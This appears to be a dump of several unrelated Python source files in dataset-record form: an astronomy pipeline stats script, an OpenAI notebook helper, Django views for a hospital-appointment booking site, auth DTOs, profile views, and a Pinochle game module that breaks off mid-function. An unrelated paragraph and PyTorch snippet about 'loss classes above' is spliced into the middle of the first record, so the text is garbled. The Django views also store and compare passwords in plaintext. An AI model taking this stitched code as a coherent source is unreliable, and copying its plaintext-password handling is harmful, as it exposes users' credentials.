variables\n \"\"\"\n # ----------------------------------------------------------------------\n # Main Code\n # ----------------------------------------------------------------------\n # get arguments\n mode = params['INPUTS']['MODE'].upper()\n # set up plotting (no plotting before this)\n recipe.plot.set_location()\n # set output to None initially\n tout, qout, eout, mout, fout = None, None, None, None, None\n # ----------------------------------------------------------------------\n # run the timing 
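Both loss classes above share one idea: compute the unreduced per-position cross-entropy, then average only over positions flagged as predictable, guarding against an empty mask as `NonZeroWeightedCrossEntropy` does. A hedged standalone sketch of that masking pattern with made-up tensor shapes:

```python
import torch
import torch.nn.functional as F

logits = torch.randn(2, 3, 4, 4)           # (batch, classes, H, W)
target = torch.randint(0, 3, (2, 4, 4))    # class indices, (batch, H, W)
mask = torch.randint(0, 2, (2, 4, 4)).bool()  # stand-in for predictable_target

# Per-position loss, then mean over masked positions only.
loss = F.cross_entropy(logits, target, reduction='none')
masked_loss = loss[mask].mean() if mask.any() else torch.tensor(0.0)
print(masked_loss)
```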
stats\n if 'TIMING' in mode or 'ALL' in mode:\n # add plots to params\n params.set('STATS_TIMING_PLOT', value=True)\n # do the timing stats\n tout = drs_stats.timing_stats(params, recipe)\n # ----------------------------------------------------------------------\n # run the qc stats\n if 'QC' in mode or 'ALL' in mode:\n # add plots to params\n params.set('STAT_QC_RECIPE_PLOT', value=True)\n # do the qc stats\n qout = drs_stats.qc_stats(params, recipe)\n # ----------------------------------------------------------------------\n # run the error stats\n if 'ERROR' in mode or 'ALL' in mode:\n # do the error stats\n eout = drs_stats.error_stats(params)\n # ----------------------------------------------------------------------\n # run the memory stats\n if 'MEMORY' in mode or 'ALL' in mode:\n # do the memory stats\n mout = drs_stats.memory_stats(params, recipe)\n # ----------------------------------------------------------------------\n # run the file index stats\n if 'FINDEX' in mode or 'ALL' in mode:\n # do the file index stats\n fout = drs_stats.file_index_stats(params)\n # ----------------------------------------------------------------------\n # combine all outputs into a single file that can be compared between\n # runs\n drs_stats.combine_stats(params, [tout, qout, eout, mout, fout])\n # ----------------------------------------------------------------------\n # End of main code\n # ----------------------------------------------------------------------\n return locals()\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\nif __name__ == \"__main__\":\n # run main with no arguments (get from command line - sys.argv)\n ll = main()\n\n# =============================================================================\n# End of code\n# =============================================================================\n","repo_name":"njcuk9999/apero-drs","sub_path":"apero/tools/recipes/bin/apero_stats.py","file_name":"apero_stats.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"5"} +{"seq_id":"33737287191","text":"import base64\nimport os\nimport re\nimport openai\nfrom IPython.display import Markdown, display\n\nopenai.api_type = os.getenv(\"OPENAI_API_TYPE\")\nopenai.api_base = os.getenv(\"OPENAI_API_BASE\")\nopenai.api_version = os.getenv(\"OPENAI_API_VERSION\")\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\ndef get_first_markdown_code_block(string):\n \"\"\"\n This function takes a string as input and returns the first markdown code block found in the string.\n \"\"\"\n pattern = re.compile(r\"```[\\s\\S]*?```\")\n match = pattern.search(string)\n if match:\n return match.group(0)\n else:\n return None\n\n\ndef display_codeblock(output):\n \"\"\"\n This function takes a string as input, parse the first code block and displays it as a markdown codeblock.\n \"\"\"\n display(Markdown(get_first_markdown_code_block(output)))\n\ndef get_system_prompt():\n return \"\"\"\n\"\"\"\n\ndef chatbot_response(system_prompt, user_prompt):\n \"\"\"\n This function takes a user prompt as input and returns the chatbot response.\n \"\"\"\n messages = [{\"role\": \"system\", \"content\": system_prompt}]\n for prompt in user_prompt:\n messages.append({\"role\": \"user\", \"content\": prompt})\n\n response = openai.ChatCompletion.create(\n engine=\"Turbo\",\n # model=\"gpt-3.5-turbo\",\n 
messages=messages,\n temperature=0.1,\n max_tokens=2048,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0,\n stop=None,\n )\n\n display(Markdown(response[\"choices\"][0][\"message\"][\"content\"]))\n return response[\"choices\"][0][\"message\"][\"content\"]\n\ndef generate_user_prompts_a():\n \"\"\"\n This function takes the active cell content, the cells above and the cells below and generates a prompt for the user.\n \"\"\"\n prompt = []\n prompt.append(\"Print Hello World\")\n return prompt\n","repo_name":"rebornix/notebook-prompts","sub_path":"prompts.py","file_name":"prompts.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74605219351","text":"import requests, json\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import Data, Location, Appointment, Hospital, Slot, Doctor, Volunteer, Phone\nfrom types import SimpleNamespace\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nimport datetime\n# Create your views here.\n\ndef index(request):\n response = requests.get(\"https://api.covid19india.org/state_district_wise.json\")\n covidData = []\n for data in response.json():\n covidData.append(data)\n context = {\n \"locations\" : Location.objects.all(),\n \"covidData\" : covidData\n }\n return render(request, 'pages/index.html', context)\n\n\ndef loadHospitals(request):\n location = request.POST['area']\n local = Location.objects.get(pk=location)\n hospitals = []\n for h in Data.objects.filter(area=local):\n hospitals.append(h)\n context = {\n \"hospitals\" : hospitals\n }\n return render(request, 'pages/hospitals.html', context)\n\n\n\ndef loadData(request):\n state = request.POST['state']\n response = requests.get(\"https://api.covid19india.org/state_district_wise.json\")\n \n districts = []\n for d in response.json()[state]['districtData']:\n districts.append(d)\n\n active = []\n deceased = []\n recovered = []\n for d in districts:\n active.append(response.json()[state]['districtData'][d]['active'])\n for d in districts:\n deceased.append(response.json()[state]['districtData'][d]['deceased']) \n for d in districts:\n recovered.append(response.json()[state]['districtData'][d]['recovered'])\n\n context = {\n \"dist\": districts,\n \"active\": active,\n \"dead\": deceased,\n \"rec\": recovered\n }\n \n return render(request, \"pages/loadData.html\", context)\n\ndef login_view(request):\n if request.user.is_authenticated:\n hosp = []\n app = []\n for h in Hospital.objects.all():\n hosp.append(h)\n for a in Appointment.objects.filter(patient=request.user):\n app.append(a)\n context = {\n \"name\" : request.user.first_name + ' ' + request.user.last_name,\n \"hospitals\": hosp,\n \"appointments\": app\n }\n return render(request, \"pages/welcome.html\", context)\n else:\n if 'hospLog' in request.session:\n return redirect(login_hosp)\n elif 'volLog' in request.session:\n return redirect(login_vol)\n else:\n return render(request, \"pages/login.html\")\n\ndef signIn(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n email = request.POST['emailLog']\n password = request.POST['pwd1']\n user = authenticate(request, username=email, password=password)\n if user is not None:\n login(request, user)\n return redirect(login_view)\n else:\n return render(request, \"pages/login.html\", 
context={\"error\": \"Incorrect Details!\"})\n\ndef register(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n else:\n if 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n return render(request, \"pages/register.html\")\n\ndef signUpUser(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n else:\n if 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n fname = request.POST['fnameReg1']\n lname = request.POST['lnameReg1']\n email = request.POST['emailReg1']\n phone = request.POST['phoneReg1']\n password = request.POST['pwdReg1']\n user = User.objects.create_user(first_name=fname, last_name=lname, username=email, email=email, password=password)\n phone = Phone.objects.create(user=user, phone=phone)\n user = authenticate(request, username=email, password=password)\n if user is not None:\n login(request, user)\n return redirect(login_view)\n else:\n return HttpResponse(\"Error in creating the account!\")\n\n\ndef logout_view(request):\n if request.user.is_authenticated:\n logout(request)\n if not request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(logout_hosp)\n else:\n return render(request, \"pages/login.html\", context={\"error\": \"User not logged in!\"})\n\ndef signUpHospital(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n count = 0\n for h in Hospital.objects.all():\n count += 1\n hp = count+1\n hID = 'NCR' + str(hp)\n #print(hID)\n name = request.POST.get('hospName')\n address = request.POST.get('hospAddress')\n phone = request.POST.get('hospPhone')\n password = request.POST.get('pwdReg2')\n if Hospital.objects.create( hID=hID, name=name, address=address, contact=phone, password=password):\n request.session['hospLog'] = hID\n print(\"reached\")\n return redirect(login_hosp)\n else:\n return HttpResponse(\"Cannot register hospital\")\n\ndef login_hosp(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'volLog' in request.session:\n return redirect(login_vol)\n else:\n slots = []\n doctors = []\n app = []\n if 'hospLog' in request.session:\n if request.session['hospLog']:\n for h in Hospital.objects.all():\n if h.hID == request.session['hospLog']:\n for s in Slot.objects.filter(hospital=h):\n slots.append(s)\n for d in Doctor.objects.filter(hospital=h):\n doctors.append(d) \n for a in Appointment.objects.filter(hospital=h):\n app.append(a)\n context = {\n \"name\": h,\n \"hid\": h.hID,\n \"slots\": slots,\n \"doctors\": doctors,\n \"appointments\": app\n }\n return render(request, \"pages/hospfunction.html\", context)\n else:\n return redirect(logout_hosp)\n else:\n slots = []\n doctors = []\n app = []\n hID = request.POST.get('hospID')\n password = request.POST.get('pwd2')\n for h in Hospital.objects.all():\n if h.hID == hID and h.password == password: \n request.session['hospLog'] = hID \n for s in Slot.objects.filter(hospital=h):\n slots.append(s) \n for d in Doctor.objects.filter(hospital=h):\n doctors.append(d) \n for a in Appointment.objects.filter(hospital=h):\n app.append(a) \n context = {\n \"name\": h,\n \"hid\": hID,\n \"slots\": slots,\n \"doctors\": doctors,\n \"appointments\": app\n }\n return render(request, \"pages/hospfunction.html\", context)\n \n return HttpResponse(\"Invalid Credentials\")\n\n\ndef logout_hosp(request):\n if 'hospLog' in request.session:\n del 
request.session['hospLog']\n return redirect(login_view)\n else:\n return render(request, \"pages/login.html\", context={\"error\": \"Hospital ID Not Logged In!\"})\n\n\ndef addSlot(request):\n if 'hospLog' in request.session:\n hID = request.POST.get('hospitalID')\n h = Hospital.objects.get(hID=hID)\n time1 = request.POST.get('Timing1')\n max1 = request.POST.get('bookTiming1')\n time2 = request.POST.get('Timing2')\n max2 = request.POST.get('bookTiming2')\n time3 = request.POST.get('Timing3')\n max3 = request.POST.get('bookTiming3')\n \n if Slot.objects.create(hospital=h, timing1=time1, max_appointments1=max1, timing2=time2, max_appointments2=max2, timing3=time3, max_appointments3=max3, book1=0, book2=0, book3=0):\n return redirect(login_hosp)\n else:\n return HttpResponse(\"Cannot create slot!\")\n\n else:\n return redirect(login_hosp)\n\ndef slotDel(request):\n if 'hospLog' in request.session:\n sID = request.POST.get('slotID')\n s = Slot.objects.get(pk=sID)\n s.delete()\n return redirect(login_hosp)\n else:\n return redirect(login_hosp)\n\ndef addDoc(request):\n if 'hospLog' in request.session: \n name = request.POST.get('name')\n spec = request.POST.get('spec')\n hId = request.POST.get('hospitalID')\n h = Hospital.objects.get(hID=hId)\n slot = request.POST.get('slot')\n s = Slot.objects.get(pk=slot)\n fees = request.POST.get('fees')\n if Doctor.objects.create(doctor=name, hospital=h, spec=spec, slot=s, fees=fees):\n return redirect(login_hosp)\n else:\n return HttpResponse(\"Cannot add doctor.\")\n else:\n return redirect(login_hosp)\n\ndef delDoc(request):\n if 'hospLog' in request.session:\n dID = request.POST.get('docID')\n d = Doctor.objects.get(pk=dID)\n d.delete()\n return redirect(login_hosp)\n else:\n return redirect(login_hosp)\n\ndef loadHosp(request):\n if request.user.is_authenticated:\n hosp = request.POST.get('hosp')\n h = Hospital.objects.get(pk=hosp)\n doc = []\n for d in Doctor.objects.filter(hospital=h):\n doc.append(d)\n context = {\n \"doctors\": doc,\n \"hosp\": hosp\n }\n return render(request, \"pages/bookApp1.html\", context)\n else:\n return redirect(login_view)\n\ndef loadDoc(request):\n if request.user.is_authenticated:\n slot = []\n hosp = request.POST.get('hosp')\n doc = request.POST.get('doc')\n d = Doctor.objects.get(pk=doc)\n for s in Slot.objects.all():\n if s == d.slot:\n if s.book1 < s.max_appointments1:\n slot.append(s.timing1)\n if s.book2 < s.max_appointments2:\n slot.append(s.timing2)\n if s.book3 < s.max_appointments3:\n slot.append(s.timing3)\n if slot:\n context = {\n \"doc\": doc,\n \"slots\": slot,\n \"hosp\": hosp,\n \"sID\": s.id\n }\n else:\n return HttpResponse(\"Daily Appointments Limit Reached!\")\n return render(request, \"pages/bookApp2.html\", context)\n else:\n return redirect(login_view)\n\ndef bookSlot(request):\n if request.user.is_authenticated:\n hosp = request.POST.get('hosp')\n h = Hospital.objects.get(pk=hosp)\n doc = request.POST.get('doc')\n d = Doctor.objects.get(pk=doc)\n sID = request.POST.get('sid')\n s = Slot.objects.get(pk=sID)\n timing = request.POST.get('slot')\n if s.timing1 == timing:\n s.book1 += 1\n elif s.timing2 == timing:\n s.book2 += 1\n elif s.timing3 == timing:\n s.book3 += 1\n s.save()\n if Appointment.objects.create(patient=request.user, doc=d, hospital=h, slot=s, confirmation='Yes', timings=timing):\n hosp = []\n app = []\n for h in Hospital.objects.all():\n hosp.append(h)\n for a in Appointment.objects.filter(patient=request.user):\n app.append(a)\n context = {\n \"name\" : request.user.first_name + ' ' + 
request.user.last_name,\n \"hospitals\": hosp,\n \"appointments\": app,\n \"success\": \"Successfully booked appointment!\"\n }\n return render(request, \"pages/welcome.html\", context)\n else:\n return HttpResponse(\"Cannot book an appointment!\")\n else:\n return redirect(login_view)\n\ndef compApp(request):\n if 'hospLog' in request.session:\n aId = request.POST.get('aid')\n print(aId)\n a = Appointment.objects.get(pk=aId)\n if a:\n print(a)\n a.complete = True\n a.save()\n return redirect(login_hosp)\n else:\n return HttpResponse(\"Could not find the appointment!\")\n else:\n return redirect(login_view)\n\ndef signUpVol(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(login_hosp)\n else:\n fname = request.POST.get(\"fname\")\n lname = request.POST.get(\"lname\")\n org = request.POST.get(\"org\")\n contact = request.POST.get(\"volPhone\")\n pwd = request.POST.get(\"pwd\")\n v = Volunteer.objects.create(first=fname, last=lname, organization=org, contact=contact, password=pwd)\n if v:\n request.session['volLog'] = v.id\n return redirect(login_vol)\n else:\n return HttpResponse(\"Cannot Create Volunteer Account!\")\n\ndef login_vol(request):\n if request.user.is_authenticated:\n return redirect(login_view)\n elif 'hospLog' in request.session:\n return redirect(login_hosp)\n elif 'volLog' in request.session:\n context = {\n \"volunteer\": Volunteer.objects.get(pk=request.session['volLog'])\n }\n return render(request, \"pages/volunteer.html\", context)\n else:\n vid = request.POST.get('vID')\n pwd = request.POST.get('pwd')\n v = Volunteer.objects.get(pk=vid)\n if v:\n if v.password == pwd:\n request.session['volLog'] = vid\n context = {\n \"volunteer\": v\n }\n return render(request, \"pages/volunteer.html\", context)\n else:\n return HttpResponse(\"Invalid Password!\")\n else: \n return HttpResponse(\"Invalid Credentials!\")\n \n return redirect(login_view)\n\ndef logout_vol(request):\n if 'volLog' in request.session:\n del request.session['volLog']\n return redirect(login_view)\n else:\n return redirect(login_view)\n\n\nnow = datetime.datetime.now()\n\nnewday = now.replace(hour=23, minute=59, second=59, microsecond=0)\n\nif now == newday:\n for s in Slot.objects.all():\n s.book1 = s.book2 = s.book3 = 0 \n for a in Appointment.objects.all():\n a.delete()\n\nprint(now)","repo_name":"ayushb2002/keepingSafe","sub_path":"Management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2136353386","text":"\"\"\" DTO Models \"\"\"\nimport datetime\nfrom src.core.models.user import User\nfrom src.core.helpers.enums import 
LoginUserType\n\n# pylint: disable=invalid-name\n\n\nclass LoginUserDto:\n \"\"\" Login User DTO \"\"\"\n\n def __init__(self, jsonObject):\n if jsonObject is not None:\n self.is_valid = False\n\n self.client_id = jsonObject.get('clientId')\n self.client_secret = jsonObject.get('clientSecret')\n self.email = jsonObject.get('email')\n self.password = jsonObject.get('password')\n self.refresh_token = jsonObject.get('refreshToken')\n if self.client_id:\n self.is_valid = True\n if self.email and self.password:\n self.type = LoginUserType.CREDENTIALS\n elif self.refresh_token:\n self.type = LoginUserType.REFRESH_TOKEN\n else:\n self.is_valid = False\n\n\nclass AuthTokenDto:\n \"\"\" Authentication Token DTO\"\"\"\n\n def __init__(self, access_token: str, refresh_token: str, user: User, token_type: str):\n self.accessToken = access_token\n self.refreshToken = refresh_token\n self.pid = user.pid\n self.roles = user.roles\n self.tokenType = token_type\n self.is_verified = user.is_verified\n\n\nclass AccessTokenDto:\n \"\"\" Access Token DTO\"\"\"\n\n def __init__(self, user: User or object, uclient_id: int = None):\n if uclient_id is not None:\n self.aid = uclient_id\n self.uid = user.id_\n self.exp = datetime.datetime.now().timestamp() + 3 * 3600\n self.roles = user.roles\n else:\n self.aid = user['aid']\n self.exp = None\n self.uid = user['uid']\n self.roles = user['roles']\n","repo_name":"sassani/python_base_api","sub_path":"src/core/models/dtos.py","file_name":"dtos.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24757585589","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\nfrom .models import UserProfile\nfrom checkout.models import Order\nfrom .forms import UserProfileForm\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n\n\n@login_required\ndef profiles(request):\n \"\"\"Simple View to render page and display profile\"\"\"\n profile = get_object_or_404(UserProfile, user=request.user)\n\n if request.method == 'POST':\n form = UserProfileForm(request.POST, instance=profile)\n if form.is_valid():\n form.save()\n messages.success(request, 'Profile Updated')\n else:\n messages.error(request, 'Something Went Wrong')\n else:\n form = UserProfileForm(instance=profile)\n orders = profile.orders.all()\n\n template = 'profiles/profiles.html'\n context = {\n 'form': form,\n 'orders': orders,\n }\n\n return render(request, template, context)\n\n\ndef order_history(request, order_number):\n order = get_object_or_404(Order, order_number=order_number)\n\n template = 'checkout/checkout_success.html'\n context = {\n 'order': order,\n 'from_profile': True,\n }\n\n return render(request, template, context)\n","repo_name":"leeton1412/mile-stone","sub_path":"profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"7622931186","text":"\"\"\"\nThis is the module that handles Pinochle game play.\n\"\"\"\nimport json\nimport uuid\nfrom typing import List, Optional\n\nfrom flask import abort, make_response\nfrom flask.wrappers import Response\n\nfrom . 
import (\n game,\n gameround,\n hand,\n player,\n round_,\n roundteams,\n score_meld,\n score_tricks,\n setup_logging,\n team,\n trick,\n)\nfrom .cards import utils as card_utils\nfrom .cards.const import SUITS\nfrom .cards.deck import PinochleDeck\nfrom .cards.utils import convert_to_svg_names, deal_hands\nfrom .models import utils\nfrom .models.game import Game\nfrom .models.gameround import GameRound\nfrom .models.hand import Hand\nfrom .models.player import Player\nfrom .models.round_ import Round\nfrom .models.roundteam import RoundTeam\nfrom .models.trick import Trick\nfrom .ws_messenger import WebSocketMessenger as WSM\n\nLOG = setup_logging()\n\n# Also contained in cardtable.py because the browser doesn't need\n# access to play_pinochle.py\nclass GameModes:\n modes = [\"game\", \"bid\", \"bidfinal\", \"reveal\", \"meld\", \"trick\"]\n _mode = 0\n\n def get_mode_str(self) -> str:\n return self.modes[self._mode]\n\n def reset(self):\n self.set(0)\n\n def set(self, mode: int = 0):\n self._mode = mode\n\n def next(self):\n \"\"\"\n Advance to next game mode, skipping over the first element when\n wrapping around.\n \"\"\"\n self._mode += 1\n self._mode %= len(self.modes)\n if self._mode == 0:\n self._mode += 1\n\n\ndef deal_pinochle(player_ids: list, kitty_len: int = 0, kitty_id: str = None) -> None:\n \"\"\"\n Deal a deck of Pinochle cards into player's hands and the kitty.\n\n :param player_ids: [description]\n :type player_ids: list\n :param kitty_len: [description]\n :type kitty_len: int\n :param kitty_id: [description]\n :type kitty_id: str\n \"\"\"\n # TODO: Think about changing this to 'look' more like a traditional deal. One or\n # three cards dealt from the top of the stack, occasionally contributing one to the\n # kitty, if applicable. It shouldn't make an actual difference, but...\n\n 
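# deal_hands() returns one deck per player plus the kitty deck (assumption: shuffling/dealing happens inside cards.utils.deal_hands)\n 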
LOG.debug(\"player_ids=%s\", player_ids)\n hand_decks, kitty_deck = deal_hands(players=len(player_ids), kitty_cards=kitty_len)\n\n if kitty_len > 0 and kitty_id is not None:\n hand.addcards(hand_id=kitty_id, cards=convert_to_svg_names(kitty_deck))\n for index, __ in enumerate(player_ids):\n player_info: Optional[Player] = utils.query_player(player_ids[index])\n hand_id = str(player_info.hand_id) if player_info else utils.UUID_ZEROS\n hand.addcards(hand_id=hand_id, cards=convert_to_svg_names(hand_decks[index]))\n\n\ndef set_players_bidding(player_ids: list) -> None:\n \"\"\"\n Update each player's record to indicate they are participating in this round's\n bidding.\n\n :param player_ids: [description]\n :type player_ids: list\n \"\"\"\n LOG.debug(\"player_ids=%s\", player_ids)\n for player_id in player_ids:\n player.update(player_id, {\"bidding\": True})\n\n\ndef set_player_pass(player_id: str) -> None:\n \"\"\"\n Update supplied player's record to indicate they are no longer participating in this\n round's bidding.\n\n :param player_id: [description]\n :type player_id: str\n \"\"\"\n LOG.debug(\"set_player: player_id=%s\", player_id)\n player.update(player_id, {\"bidding\": False})\n\n\ndef players_still_bidding(round_id: str) -> List[str]:\n \"\"\"\n Returns list of player_ids still bidding in the supplied round.\n\n :param round_id: [description]\n :type round_id: str\n :return: List of player_ids\n :rtype: List[str]\n \"\"\"\n player_ids = roundteams.create_ordered_player_list(round_id)\n return [\n player_id for player_id in player_ids if utils.query_player(player_id).bidding\n ]\n\n\ndef submit_bid(round_id: str, player_id: str, bid: int):\n \"\"\"\n This function processes a bid submission for a player.\n\n :param round_id: Id of the round receiving the bid\n :param player_id: Id of the player submitting the bid\n :return: 200 on successful bid, 404 if not found,\n 409 if requirements are not satisfied.\n \"\"\"\n LOG.debug(\"\\nround_id=%s, player_id=%s\", round_id, player_id)\n # Get the round requested\n a_round: Round = utils.query_round(str(round_id))\n a_player: Optional[Player] = utils.query_player(str(player_id))\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find a player?\n if a_player is None or a_player == {}:\n abort(404, f\"Player {player_id} not found.\")\n\n if bid != -1 and a_round.bid >= bid:\n # New bid must be higher than current bid.\n abort(409, f\"Bid {bid} is below current bid {a_round.bid}.\")\n\n # Determine the next player to bid this round.\n ordered_player_list = players_still_bidding(round_id)\n next_bid_player_idx = determine_next_bidder_player_id(\n player_id, ordered_player_list\n )\n\n # If the bid is still progressing, continue prompting.\n game_id = str(utils.query_gameround_for_round(round_id).game_id)\n if bid > 0:\n # Prompt that player to bid.\n send_bid_message(\n \"bid_prompt\",\n game_id,\n ordered_player_list[next_bid_player_idx],\n bid if bid > 0 else a_round.bid,\n )\n\n return round_.update(round_id, {\"bid\": bid, \"bid_winner\": player_id})\n\n ## Bid == -1\n # If supplied bid is -1, this indicates the player passed.\n set_player_pass(player_id)\n\n if len(ordered_player_list) == 2: # Now one since a player passed...\n send_bid_message(\n \"bid_winner\",\n game_id,\n ordered_player_list[next_bid_player_idx],\n a_round.bid,\n )\n # TODO: Figure out if this can possibly happen more than once. 
I don't think so,\n # but it would add another set of cards to the player's hand if it did.\n # Add the cards from the kitty, if any, to the player's hand.\n for hand_obj in utils.query_hand_list(str(utils.query_round(round_id).hand_id)):\n hand.addcard(\n str(\n utils.query_player(ordered_player_list[next_bid_player_idx]).hand_id\n ),\n hand_obj.card,\n )\n # Record the bid winner's ID\n round_.update(\n round_id, {\"bid_winner\": ordered_player_list[next_bid_player_idx]}\n )\n t_trick, _ = trick.create(round_id)\n trick.update(\n str(t_trick[\"trick_id\"]),\n {\"trick_starter\": ordered_player_list[next_bid_player_idx]},\n )\n # Step to the next game state.\n game.update(game_id, state=True)\n else:\n send_bid_message(\n \"bid_prompt\",\n game_id,\n ordered_player_list[next_bid_player_idx],\n bid if bid > 0 else a_round.bid,\n )\n\n return {}, 200\n\n\ndef finalize_meld(round_id: str, player_id: str):\n \"\"\"\n This function processes a meld finalize submission for a player.\n\n :param round_id: Id of the round in play\n :param player_id: Id of the player submitting the meld\n :return: 200 on success, 404 if not found,\n 409 if requirements are not satisfied.\n \"\"\"\n LOG.debug(\"finalize_meld: round_id=%s, player_id=%s\", round_id, player_id)\n # Get the round requested\n a_round: Round = utils.query_round(str(round_id))\n a_player: Optional[Player] = utils.query_player(str(player_id))\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find a player?\n if a_player is None or a_player == {}:\n abort(404, f\"Player {player_id} not found.\")\n\n # Gather all the players for this round.\n player_list = utils.query_player_ids_for_round(round_id)\n\n if player_id not in player_list:\n abort(404, f\"Player {player_id} not playing this round.\")\n\n player.update(player_id, {\"meld_final\": True})\n\n # Check to see if all players are ready for the next round.\n if all(utils.query_player(x).meld_final for x in player_list):\n # All meld is final\n total_team_scores(round_id)\n\n\ndef total_team_scores(round_id: str):\n \"\"\"\n All meld is final, total the team scores so far and update the database.\n\n :param round_id: Round ID in play\n :type round_id: str\n \"\"\"\n LOG.debug(\"total_team_scores: Totalling team scores\")\n\n ws_mess = WSM()\n game_id = str(utils.query_gameround_for_round(round_id).game_id)\n\n # Total each team's meld.\n for t_roundteam in utils.query_roundteam_list(round_id):\n team_id = str(t_roundteam.team_id)\n total = utils.query_team(team_id).score\n meld_score = sum(\n utils.query_player(t_player.player_id).meld_score\n for t_player in utils.query_teamplayer_list(team_id)\n )\n total += meld_score\n team.update(team_id, {\"score\": total})\n\n # Communicate team scores:\n message = {\n \"action\": \"team_score\",\n \"team_id\": team_id,\n \"score\": total,\n \"meld_score\": meld_score,\n }\n ws_mess.websocket_broadcast(game_id, message)\n\n # Advance the game mode.\n game.update(game_id, state=True)\n\n\ndef determine_next_bidder_player_id(player_id: str, ordered_player_list: List[str]):\n \"\"\"\n Determine the next player to bid this round.\n\n :param player_id: Player ID who bid last\n :type player_id: str\n :param ordered_player_list: Ordered list of players\n :type ordered_player_list: List[str]\n :raises IndexError: [description]\n :return: [description]\n :rtype: [type]\n \"\"\"\n try:\n next_bid_player_idx = ordered_player_list.index(player_id)\n next_bid_player_idx += 1\n 
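# wrap past the end of the list so bidding cycles back to the first player\n 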
next_bid_player_idx %= len(ordered_player_list)\n return next_bid_player_idx\n except IndexError as err:\n if not ordered_player_list:\n return 0\n raise IndexError(err) from err\n\n\ndef send_bid_message(message_type: str, game_id: str, player_id: str, bid: int):\n \"\"\"\n Send a websocket message to all players with a bid-related message with the\n information about the next bidder and current bid, or who has won the bid.\n\n :param message_type: Type of bid message\n :type message_type: str\n :param game_id: Game identifier\n :type game_id: str\n :param player_id: Player identifier\n :type player_id: str\n :param bid: Amount of bid\n :type bid: int\n \"\"\"\n # Prompt the next player to bid.\n ws_mess = WSM()\n message = {\n \"action\": message_type,\n \"player_id\": player_id,\n \"bid\": bid,\n }\n ws_mess.websocket_broadcast(game_id, message)\n\n\ndef set_trump(round_id: str, player_id: str, trump: str):\n \"\"\"\n This function processes trump submission by a player.\n\n :param round_id: Id of the round in play\n :param player_id: Id of the player submitting the trump suit\n :return: 200 on success, 404 if not found,\n 409 if requirements are not satisfied.\n \"\"\"\n LOG.debug(\"\\nround_id=%s, player_id=%s\", round_id, player_id)\n # Get the round requested\n a_round: Round = utils.query_round(str(round_id))\n a_player: Optional[Player] = utils.query_player(str(player_id))\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find a player?\n if a_player is None or a_player == {}:\n abort(404, f\"Player {player_id} not found.\")\n\n # New trump must not already be set.\n LOG.debug(\"Bid winner=%s, player_id=%s\", a_round.bid_winner, player_id)\n if str(a_round.bid_winner) != player_id:\n LOG.debug(\"set_trump: Bid winner %s must submit trump.\", a_round.bid_winner)\n abort(409, f\"Bid winner {a_round.bid_winner} must submit trump.\")\n\n if \"{}s\".format(trump.capitalize()) not in SUITS:\n abort(409, f\"Trump suit must be one of {SUITS}.\")\n\n ws_mess = WSM()\n message = {\n \"action\": \"trump_selected\",\n \"trump\": trump,\n }\n game_id = str(utils.query_gameround_for_round(round_id).game_id)\n ws_mess.websocket_broadcast(game_id, message)\n\n # Step to next game state.\n game.update(game_id, state=True)\n return round_.update(round_id, {\"trump\": trump})\n\n\ndef start(round_id: str):\n \"\"\"\n This function starts a round if all the requirements are satisfied.\n\n :param round_id: Id of the round to commence.\n :return: 200 on success, 404 if not found,\n 409 if requirements are not satisfied.\n \"\"\"\n LOG.info(\"In play_pinochle.start()\")\n LOG.debug(\"\\nround_id=%s\", round_id)\n\n # Get the round requested\n a_round: Round = utils.query_round(round_id)\n a_gameround: GameRound = utils.query_gameround_for_round(round_id)\n\n # Did we find a round?\n if not a_round:\n LOG.debug(\"Round %s not found.\", round_id)\n abort(404, f\"Round {round_id} not found.\")\n\n # Retrieve the information for the round and teams.\n round_t: list = utils.query_roundteam_list(round_id)\n\n # Did we find one or more round-team entries?\n if not round_t:\n LOG.debug(\"No teams found for round %s\", round_id)\n abort(409, f\"No teams found for round {round_id}.\")\n\n # Retrieve the information for the associated game.\n a_game: Game = utils.query_game(str(a_gameround.game_id))\n\n # Did we find a game?\n if a_game is None:\n LOG.debug(\"No game found for round %s\", round_id)\n abort(409, f\"No game 
